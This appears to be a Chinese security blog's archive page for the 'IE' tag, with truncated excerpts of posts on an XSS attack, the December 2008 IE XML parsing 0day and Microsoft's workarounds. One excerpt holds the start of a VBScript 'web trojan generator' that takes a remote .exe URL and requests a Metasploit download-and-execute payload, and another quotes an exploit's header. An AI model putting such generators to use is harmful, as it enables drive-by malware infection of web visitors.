标签 ‘IE’ 下的日志
誰在看我的噗?第二回:IE執行模式 vs 跨網站腳本漏洞(XSS)
# 鬼仔:誰在看我的噗?第一回:DOM沙盒 vs 跨網站腳本漏洞(XSS)
简体中文在这里。
来源:阿碼外傳
Web、HTML、CSS、各家瀏覽器,都在持續演進著,以資安的觀點來看,演進的過程中包含了許多為了修補當初不安全設計而做得努力。IE,現在已經到IE 8了。
本文續「誰在看我的噗?第一回:DOM沙盒 vs 跨網站腳本漏洞(XSS)」。
許 多朋友透過email/msn/plurk問我,這個攻擊為何說IE<=7才能觸發?其實這個問題不是三言兩語解釋得清楚,所以我只在文中寫IE& lt;=7,不想讓已經很長的一篇變得更長,但沒想到大家都很厲害,這個問題大家都還是問了。那我們就來談談,為何此攻擊IE<=7才能work 吧!
阅读全文 »
MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)
<!–
IE XML Heap Corruption exploit
by krafty
greets to hdm, ddz, SK, muts, halvar, grugq, and all the ethnical hackers
sux to exploit traders – ZDI, WabiSabiLabi, and all you h0arders.
Bring back the days of technotronic and r00tshell! Freedom.
poc: launches calculator.
Tested with IE7 XP SP2, SP3, Vista.
–>
阅读全文 »
MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day 网马生成器
作者:lcx
‘code by lcx
On Error Resume Next
Exeurl = InputBox( “请输入exe的地址:”, “输入”, “http://www.haiyangtop.net/333.exe” )
url=”http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL=”&URLEncoding(Exeurl)&”&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload”
阅读全文 »
Microsoft 安全通报:4 种方法暂时屏蔽 IE 最新 0day
# 鬼仔:这几天一直没上网,所以也没更新,积累到今天。
来源:cnbeta
IE 最新 0day 波及了微软全线系统,目前暂时没有补丁。微软于近日发布了一份安全通报,指导您如何暂时屏蔽此漏洞。
漏洞出在 OLEDB32.dll 这个文件上。所以我们的目的就是屏蔽这个文件。对此,微软连出了4个杀手锏:
1. SACL 法(仅适用于 Vista)
[Unicode]
Unicode=yes
[Version]
signature=”$CHICAGO$”
Revision=1
[File Security]
“%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll”,2,”S:(ML;;NWNRNX;;;ME)”
阅读全文 »
IE 0day漏洞的最新消息:所有版本的IE都受影响
作者:tombkeeper
微软更新了对这个漏洞的公告:
December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds.
阅读全文 »